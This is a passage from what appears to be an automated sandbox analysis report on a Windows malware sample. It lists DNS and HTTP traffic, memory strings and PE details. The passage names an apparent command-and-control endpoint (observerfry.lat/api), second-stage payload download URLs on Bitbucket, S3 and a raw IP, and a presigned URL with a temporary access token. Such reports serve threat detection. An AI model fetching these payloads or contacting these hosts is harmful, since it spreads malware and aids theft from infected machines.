10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J2I4rdz2f%2FJD7Dq%2BF00i4OW%2FxQJ6LqwaPMAIX%2BQcsPV%2FFwo5WAIfoy4W9ygeWg5MqgxcHVu2NP6C0NWOAsSPP7l0qE173HnB8MnL9e%2BJ20gyBJBLs4rwHZCoPdcAVgc%2FS9V3Jg%3D%3D&Expires=1735036690 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000979000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2570535052.0000000000979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: fnCae9FQhg.exe, 00000001.00000002.2573643849.0000000005EB9000.00000002.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506188966.0000000005876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000953000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000955000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506709241.0000000000969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000955000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000955000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2570241622.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: fnCae9FQhg.exe, 00000001.00000002.2570223927.000000000085A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0
                Source: fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000953000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2361173008.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364529673.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2414518158.0000000000979000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2365046031.0000000000979000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2361076263.0000000000979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
                Source: fnCae9FQhg.exe, 00000001.00000003.2365046031.0000000000979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apiC
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apibP
                Source: fnCae9FQhg.exe, 00000001.00000003.2361076263.0000000000979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apie3
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apix=0
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apiype-
                Source: fnCae9FQhg.exe, 00000001.00000003.2361173008.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364529673.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/es
                Source: fnCae9FQhg.exe, 00000001.00000003.2365135377.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2414674758.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/ic
                Source: fnCae9FQhg.exe, 00000001.00000003.2365135377.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2570241622.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2414674758.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000955000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506709241.0000000000969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/ks(;
                Source: fnCae9FQhg.exe, 00000001.00000003.2365135377.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2414674758.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2361173008.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364529673.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/ksp;
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/pi
                Source: fnCae9FQhg.exe, 00000001.00000003.2361173008.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364529673.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/r8;
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: fnCae9FQhg.exe, 00000001.00000003.2310692867.00000000058DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: fnCae9FQhg.exe, 00000001.00000003.2310692867.00000000058DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000953000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-
                Source: fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: fnCae9FQhg.exe, 00000001.00000003.2311059794.00000000057EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: fnCae9FQhg.exe, 00000001.00000003.2311059794.00000000057EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: fnCae9FQhg.exe, 00000001.00000003.2310692867.00000000058DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: fnCae9FQhg.exe, 00000001.00000003.2310692867.00000000058DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: fnCae9FQhg.exe, 00000001.00000003.2310692867.00000000058DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49773 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 16.182.108.137:443 -> 192.168.2.6:49784 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: fnCae9FQhg.exeStatic PE information: section name:
                Source: fnCae9FQhg.exeStatic PE information: section name: .rsrc
                Source: fnCae9FQhg.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_3_057D2B0B1_3_057D2B0B
